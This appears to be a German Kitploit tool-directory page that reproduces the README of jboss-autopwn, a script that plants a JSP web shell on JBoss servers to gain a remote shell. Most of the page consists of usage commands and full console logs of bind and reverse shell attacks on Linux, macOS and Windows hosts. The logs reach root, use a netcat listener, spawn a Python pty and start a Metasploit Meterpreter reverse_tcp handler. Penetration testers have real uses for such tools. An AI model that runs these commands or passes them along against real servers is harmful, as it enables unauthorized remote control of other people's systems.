Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/spiderlabs/jboss-autopwn
Payload-GenerierungExploitationWebanwendungs-ExploitationPost-ExploitationPenetrationstestsCommand and ControlRemote-Access-ToolArchived
GitHubspiderlabs/jboss-autopwn

jboss-autopwn

Ein JBoss-Skript zum Erhalten von Remote-Shell-Zugriff

Repository anzeigen
1775511vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

:⚠️ HINWEIS: Dieses Tool wird nicht mehr aktiv gewartet.

JBoss Autopwn Script Christian G. Papathanasiou http://www.spiderlabs.com

EINFÜHRUNG

Dieses JBoss-Skript stellt eine JSP-Shell auf dem Ziel-JBoss-AS-Server bereit. Nach der Bereitstellung nutzt das Skript seine Upload- und Befehlsausführungsfähigkeit, um eine interaktive Sitzung bereitzustellen.

Funktionen umfassen:

  • Multiplattform-Unterstützung – getestet auf Windows-, Linux- und Mac-Zielen
  • Unterstützung für Bind- und Reverse-Bind-Shells
  • Meterpreter-Shells und VNC-Unterstützung für Windows-Ziele

INSTALLATION

Abhängigkeiten umfassen

  • Netcat
  • Curl
  • Metasploit v3, installiert im aktuellen Pfad als "framework3"

VERWENDUNG

Verwenden Sie e.sh für *nix-Ziele, die bind_tcp und reverse_tcp verwenden

./e.sh target_ip tcp_port

Verwenden Sie e2.sh für Windows-Ziele, die Metasploit-Windows-Payloads ausführen können

/e2.sh target_ip tcp_port

BEISPIELE

Linux Bind-Shell:

[root@nitrogen jboss]# ./e.sh 192.168.1.2 8080 2>/dev/null [x] Cookie abrufen [x] BSH-Skript wird erstellt... [x] .war-Datei erfolgreich in /tmp erstellt [x] .war-Datei wird bereitgestellt: http://192.168.1.2:8080/browser/browser/browser.jsp [x] Ausführung als Benutzer...: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) [x] Server uname...: Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux [!] Möchten Sie eine Reverse- oder eine Bind-Shell hochladen? bind [!] Auf welchem Port soll die Bind-Shell lauschen? 31337 [x] Lade Bind-Shell-Payload hoch.. [x] Prüfe, ob der Upload erfolgreich war... -rwxrwxrwx 1 root root 172 2009-11-22 19:48 /tmp/payload [x] Sie sollten eine Bind-Shell auf 192.168.1.2:31337 haben.. [x] Sie werden in eine Shell gesteckt... Connection to 192.168.1.2 31337 port [tcp/*] succeeded! id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) python -c 'import pty; pty.spawn("/bin/bash")' [root@nitrogen /]# vollständig interaktive Shell :-)

Linux Reverse-Shell:

[root@nitrogen jboss]# nc -lv 31337 & [1] 15536 [root@nitrogen jboss]# ./e.sh 192.168.1.2 8080 2>/dev/null [x] Cookie abrufen [x] BSH-Skript wird erstellt... [x] .war-Datei erfolgreich in /tmp erstellt [x] .war-Datei wird bereitgestellt: http://192.168.1.2:8080/browser/browser/browser.jsp [x] Ausführung als Benutzer...: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) [x] Server uname...: Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux [!] Möchten Sie eine Reverse- oder eine Bind-Shell hochladen? reverse [!] Auf welchem Port möchten Sie die Reverse-Shell empfangen? 31337 [x] Lade Reverse-Shell-Payload hoch.. [x] Prüfe, ob der Upload erfolgreich war... -rwxrwxrwx 1 root root 157 2009-11-22 19:49 /tmp/payload Connection from 192.168.1.2 port 31337 [tcp/*] accepted [x] Sie sollten eine Reverse-Shell auf localhost:31337 haben.. [root@nitrogen jboss]# jobs [1]+ Running nc -lv 31337 & [root@nitrogen jboss]# fg 1 nc -lv 31337 id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) python -c 'import pty; pty.spawn("/bin/bash")'; [root@nitrogen /]# vollständig interaktives tty :-) full interactive tty :-)

Gegen MacOS X (Bind-Shell):

[root@nitrogen jboss]# ./e.sh 192.168.1.5 8080 2>/dev/null [x] Cookie abrufen [x] BSH-Skript wird erstellt... [x] .war-Datei erfolgreich in /tmp erstellt [x] .war-Datei wird bereitgestellt: http://192.168.1.5:8080/browser/browser/browser.jsp [x] Ausführung als Benutzer...: uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),101(com.apple.sharepoint.group.1),80(admin),20(staff),102(com.apple.sharepoint.group.2) [x] Server uname...: Darwin helium-2.tiscali.co.uk 9.7.1 Darwin Kernel Version 9.7.1: Thu Apr 23 13:52:18 PDT 2009; root:xnu-1228.14.1~1/RELEASE_I386 i386 [!] Möchten Sie eine Reverse- oder eine Bind-Shell hochladen? bind [!] Auf welchem Port soll die Bind-Shell lauschen? 31337 [x] Lade Bind-Shell-Payload hoch.. [x] Prüfe, ob der Upload erfolgreich war... -rwxrwxrwx 1 root wheel 172 22 Nov 19:58 /tmp/payload [x] Sie sollten eine Bind-Shell auf 192.168.1.5:31337 haben.. [x] Sie werden in eine Shell gesteckt... Connection to 192.168.1.5 31337 port [tcp/*] succeeded! id uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),101(com.apple.sharepoint.group.1),80(admin),20(staff),102(com.apple.sharepoint.group.2) python -c 'import pty; pty.spawn("/bin/bash")' bash-3.2# id id uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),101(com.apple.sharepoint.group.1),80(admin),20(staff),102(com.apple.sharepoint.group.2) bash-3.2#

Ebenso für die Reverse-Shell.

Windows Bind-Shell:

[root@nitrogen jboss]# ./e2.sh 192.168.1.225 8080 2>/dev/null [x] Cookie abrufen [x] BSH-Skript wird erstellt... [x] .war-Datei erfolgreich auf C: erstellt [x] .war-Datei wird bereitgestellt: [x] Web-Shell aktiviert!: http://192.168.1.225:8080/browserwin/browser/Browser.jsp [x] Servername...: Host Name . . . . . . . . . . . . : aquarius [x] Möchten Sie eine Reverse- oder Bind-Shell oder VNC (Bind)? bind [x] Auf welchem Port soll Ihre Bind-Shell lauschen? 31337 [x] Lade Bind-Shell-Payload hoch.. [x] Prüfe, ob die Bind-Shell korrekt hochgeladen wurde.. [x] Bind-Shell hochgeladen: 22/11/2009 18:35 87,552 payload.exe [x] Führe Bind-Shell aus... [x] Bind-Shell ausgeführt! [x] Wechsle zu Metasploit.... [] Started bind handler [] Starting the payload handler... [*] Command shell session 1 opened (192.168.1.2:60535 -> 192.168.1.225:31337)

Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\chris\Desktop\jboss-4.2.3.GA\server\default\tmp\deploy\tmp8376972724011216327browserwin-exp.war>

Windows Reverse-Shell mit einem Metasploit-Meterpreter-Payload:

[root@nitrogen jboss]# ./e2.sh 192.168.1.225 8080 2>/dev/null [x] Cookie abrufen [x] BSH-Skript wird erstellt... [x] .war-Datei erfolgreich auf C: erstellt [x] .war-Datei wird bereitgestellt: [x] Web-Shell aktiviert!: http://192.168.1.225:8080/browserwin/browser/Browser.jsp [x] Servername...: Host Name . . . . . . . . . . . . : aquarius [x] Möchten Sie eine Reverse- oder Bind-Shell oder VNC (Bind)? reverse [x] Auf welchem Port möchten Sie Ihre Reverse-Shell empfangen? 31337 [x] Lade Reverse-Shell-Payload hoch.. [x] Prüfe, ob die Reverse-Shell korrekt hochgeladen wurde.. [x] Reverse-Shell hochgeladen: 22/11/2009 18:46 87,552 payload.exe [x] Sie haben jetzt 20 Sekunden, um Metasploit zu starten, bevor ich eine Reverse-Shell zurücksende.. ctrl-z, bg, dann eingeben: framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=31337 E [x] Führe Reverse-Shell aus... [x] Reverse-Shell ausgeführt! [root@nitrogen jboss]#

In Terminal 2:

[root@nitrogen jboss]# framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=31337 E

[] Please wait while we load the module tree... [] Started reverse handler on port 31337 [] Starting the payload handler... [] Sending stage (719360 bytes) [*] Meterpreter session 1 opened (192.168.1.2:31337 -> 192.168.1.225:1266)

Tool herunterladen